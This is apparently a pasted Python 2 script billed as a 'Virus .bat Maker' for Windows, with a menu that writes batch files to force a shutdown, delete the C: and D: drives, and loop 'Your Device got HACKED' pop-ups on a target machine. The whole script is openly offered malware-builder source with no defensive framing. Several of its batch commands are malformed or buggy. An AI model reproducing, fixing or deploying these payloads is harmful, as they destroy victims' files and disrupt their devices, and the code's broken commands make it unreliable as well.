3.0 KB

  1. #!/usr/bin/python
  2. ############################### TOOLS MAKED BY G3D1T
  3. import os
  4. import urllib2
  5. import json
  6. import time
  7. import smtplib
  8. from termcolor import colored, cprint
  9. from base64 import *
  10. ############################### RECODE AUTO JAHANNAM
  11. os.system("reset")
  12. print ("\033[93m ____ ____ _____ ___ _____ _____ _____ _ _ _ _ _")
  13. print ("\033[93m | _ \| _ \|_ _\ \ / / \|_ _| ____| |_ _| | | | / \ | \ | |")
  14. print ("\033[93m | |_) | |_) || | \ \ / / _ \ | | | _| | | | |_| | / _ \ | \| |")
  15. print ("\033[93m | __/| _ < | | \ V / ___ \| | | |___ | | | _ |/ ___ \| |\ |")
  16. print ("\033[93m |_| |_| \_\___| \_/_/ \_\_| |_____| |_| |_| |_/_/ \_\_| \_|")
  17. print ("\033[93m ========================================")
  18. print ("\033[34m [+] TOOLS : Virus .bat Maker for OS Windows")
  19. print ("\033[34m [+] Author : Nathan")
  20. print ("\033[95m [-] Found bug / crash ? contact my instagram at @nathandeft")
  21. print ("\033[34m [+] My Team = Anon Cyber Team | Security Darknet")
  22. print ("\033[34m [+] Thanks to : My Team, CodayID, and All My Friend")
  23. text = colored('Hargai Creator / Author Tools dengan tidak me RECODE tools ini' , 'cyan', attrs=['reverse', 'blink'])
  24. print (text)
  25. print ("\033[93m ========================================")
  26. def menu():
  27. print'\33[33m Choose The Selection :'
  28. print'\33[33m -----------------'
  29. print'\33[33m [1] Shutdown'
  30. print'\33[33m [2] Delete all Files Target'
  31. print'\33[33m [3] Summon Text Permanently'
  32. print'\33[33m [4] Exit'
  33. print'\33[33m -----------------'
  34. def shutdown():
  35. thangans = open ("shutdown.bat","w")
  36. virus = """
  37. @echo shutdown -s -t 1 -f
  38. """
  39. thangans.write(virus)
  40. thangans.close
  41. print 'Want Create our Virus? (y/n)'
  42. back=raw_input().upper()
  43. if back=='y':
  44. menu()
  45. else:
  46. exit()
  47. def delete():
  48. thangans = open ("delete.bat","w")
  49. virus = """
  50. @echo off
  51. DEL C: -Y
  52. DEL D: -Y
  53. """
  54. thangans.write(virus)
  55. thangans.close
  56. print 'Want Create our Virus? (y/n)'
  57. back=raw_input().upper()
  58. if back=='y':
  59. menu()
  60. else:
  61. exit()
  62. def summon():
  63. thangans = open ("summon.bat","w")
  64. virus = """
  65. @echo off
  66. :Begin
  67. msg * Your Device got HACKED
  68. msg * Your Device was infected by THAN MALWARE
  69. msg * Re - Install your Device
  70. go to begin
  71. """
  72. thangans.write(virus)
  73. thangans.close
  74. print 'Want Create our Virus? (y/n)'
  75. back=raw_input().upper()
  76. if back=='y':
  77. menu()
  78. else:
  79. exit()
  80. menu()
  81. while 1:
  82. pilih=input('Input Your Selection : ')
  83. if pilih==1:
  84. shutdown()
  85. elif pilih==2:
  86. delete()
  87. elif pilih==3:
  88. summon()
  89. elif pilih==4 :
  90. exit()
  91. else:
  92. print'maaf pilihan anda tidak ada dimenu'
  93. print'sorry, your selection not available on menu'
  94. print'Want Create our Virus? (y/n)'
  95. back=raw_input().upper()
  96. if back=='y':
  97. menu()
  98. else:
  99. exit()